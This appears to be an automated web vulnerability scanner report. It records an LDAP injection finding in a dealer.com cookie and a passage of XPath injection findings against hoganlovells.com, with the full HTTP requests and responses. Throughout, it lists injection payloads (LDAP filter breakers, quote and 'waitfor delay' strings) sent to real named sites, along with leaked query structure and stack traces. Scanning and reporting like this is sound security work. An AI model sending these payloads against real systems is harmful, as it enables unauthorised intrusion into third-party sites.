   <p>Since we've had a Dealer.com website our traffic has increased, our conversion has increased, and our website ranking is great. If you Google &#8220;used cars in Denver,&#8221; we are always on top.</p>
   <cite>Mike Mattingly, Internet Sales Manager, Budget Car Sales</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Our sites perform better now than they ever have. Our dealers are very happy with our performance. Everyone&#8217;s extremely pleased with Dealer.com.</p>
   <cite>Cassie Broemmer, Van Tuyl Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="C
...[SNIP]...

1.12. http://www.dealer.com/solutions/oem/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./products/ cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /solutions/oem/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./products/ cookie appears to be vulnerable to LDAP injection attacks.

The payloads 405dbe54cabfaef5)(sn=* and 405dbe54cabfaef5)!(sn=* were each submitted in the com.silverpop.iMA.page_visit./products/ cookie. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /solutions/oem/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/solutions/oem/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=1; com.silverpop.iMA.page_visit./products/=405dbe54cabfaef5)(sn=*; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003121; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fsolutions%2Foem%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fsolutions%2Fagencies%2F%22%3Bi%3A2%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A3%3Bs%3A33%3A%22%2Fproducts%2Fwebsites%2Fcontrolcenter%2F%22%3Bi%3A4%3Bs%3A10%3A%22%2Fproducts%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.56.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 19967
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:22:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003378; expires=Mon, 16-Apr-2012 01:22:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Ranked #8 in the nation in April and #12 YTD (up from 16th last year), you and your team have been leading our progress.</p>
   <cite>Ken Girard, McGrath Acura of Westmont</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>The number of visitors has doubled since we went on board nearly a year and a half ago.</p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>The back-end tool is one of the simplest I've seen. It's like working with a Microsoft Office program. Everything is easily spelled out for you.</p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>The backend administrative system is just so easy and fast to use.</p>
   <cite>Greg Nalewaja, General Manager, Metro Honda of Union County</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We&#8217;re getting more qualified traffic to our website. We&#8217;re getting more qualified leads and we&#8217;re closing a higher percentage of them.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/online-a
...[SNIP]...

Request 2

GET /solutions/oem/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/solutions/oem/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=1; com.silverpop.iMA.page_visit./products/=405dbe54cabfaef5)!(sn=*; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003121; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fsolutions%2Foem%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fsolutions%2Fagencies%2F%22%3Bi%3A2%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A3%3Bs%3A33%3A%22%2Fproducts%2Fwebsites%2Fcontrolcenter%2F%22%3Bi%3A4%3Bs%3A10%3A%22%2Fproducts%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.56.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 19998
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:23:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003379; expires=Mon, 16-Apr-2012 01:22:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>We were looking for an all-in-one solution&#8212;one company with expertise in all the different fields. That is why we chose Dealer.com. </p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>It was very important to find someone with a suite of products that could not only help us today, but could help us in the long term.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Whether you are 1000 miles away or whether you&#8217;re 100 miles away, you really feel that you&#8217;re part of this Dealer.com family.</p>
   <cite>Christopher Della Bella, D&#8217;Ella Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Our sites perform better now than they ever have. Our dealers are very happy with our performance. Everyone&#8217;s extremely pleased with Dealer.com.</p>
   <cite>Cassie Broemmer, Van Tuyl Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>From an Enterprise Level, Dealer.com's products have saved me hours a month in gathering my reporting and understanding what our site is doing for us. </p>
   <cite>Dan Boismer, Suburban Collection</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Video_Blog.jpg" alt="Enhance SEO with our video blogging tool" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile
...[SNIP]...

2. XPath injection
There are 32 instances of this issue:

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.



2.1. http://www.hoganlovells.com/AboutUs/Online_Client [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /AboutUs/Online_Client

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /AboutUs')waitfor%20delay'0%3a0%3a20'--/Online_Client HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:22:19 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6683
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='aboutus')waitfor%20delay'0:0:20'--/online_client']' has an invalid token.</title>
<style>
body {font-fa
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='aboutus')waitfor%20delay'0:0:20'--/online_client']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='aboutus')waitfor%20delay'0:0:20'--/online_client']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

2.2. http://www.hoganlovells.com/AboutUs/Online_Client [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /AboutUs/Online_Client

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /AboutUs/Online_Client' HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:22:20 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7846
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.
...[SNIP]...

2.3. http://www.hoganlovells.com/AboutUs/Online_Client_Service/Overview/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /AboutUs/Online_Client_Service/Overview/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /AboutUs'/Online_Client_Service/Overview/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:21:40 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8252
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...

2.4. http://www.hoganlovells.com/AboutUs/Online_Client_Service/Overview/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /AboutUs/Online_Client_Service/Overview/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /AboutUs/Online_Client_Service'/Overview/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:21:41 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...

2.5. http://www.hoganlovells.com/AboutUs/Online_Client_Service/Overview/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /AboutUs/Online_Client_Service/Overview/

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /AboutUs/Online_Client_Service/Overview'waitfor%20delay'0%3a0%3a20'--/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:21:46 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6763
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='aboutus/online_client_service/overview'waitfor%20delay'0:0:20'--']' has an invalid token.</title>
<style>

...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='aboutus/online_client_service/overview'waitfor%20delay'0:0:20'--']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='aboutus/online_client_service/overview'waitfor%20delay'0:0:20'--']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

2.6. http://www.hoganlovells.com/aboutus/history/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /aboutus/history/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /aboutus'/history/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:21:16 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...

2.7. http://www.hoganlovells.com/aboutus/history/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /aboutus/history/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /aboutus/history')waitfor%20delay'0%3a0%3a20'--/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:21:22 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6653
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='aboutus/history')waitfor%20delay'0:0:20'--']' has an invalid token.</title>
<style>
body {font-family:"
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='aboutus/history')waitfor%20delay'0:0:20'--']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='aboutus/history')waitfor%20delay'0:0:20'--']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

2.8. http://www.hoganlovells.com/aboutus/overview/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /aboutus/overview/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /aboutus'/overview/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:21:56 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...

2.9. http://www.hoganlovells.com/aboutus/overview/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /aboutus/overview/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /aboutus/overview'waitfor%20delay'0%3a0%3a20'--/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:22:02 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6653
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='aboutus/overview'waitfor%20delay'0:0:20'--']' has an invalid token.</title>
<style>
body {font-family:"
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='aboutus/overview'waitfor%20delay'0:0:20'--']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='aboutus/overview'waitfor%20delay'0:0:20'--']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

2.10. http://www.hoganlovells.com/newsmedia/awardsrankings [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/awardsrankings

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia')waitfor%20delay'0%3a0%3a20'--/awardsrankings HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:05:06 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6698
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='newsmedia')waitfor%20delay'0:0:20'--/awardsrankings']' has an invalid token.</title>
<style>
body {font
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia')waitfor%20delay'0:0:20'--/awardsrankings']' has an invalid token.<br>
...[SNIP]...
<pre>

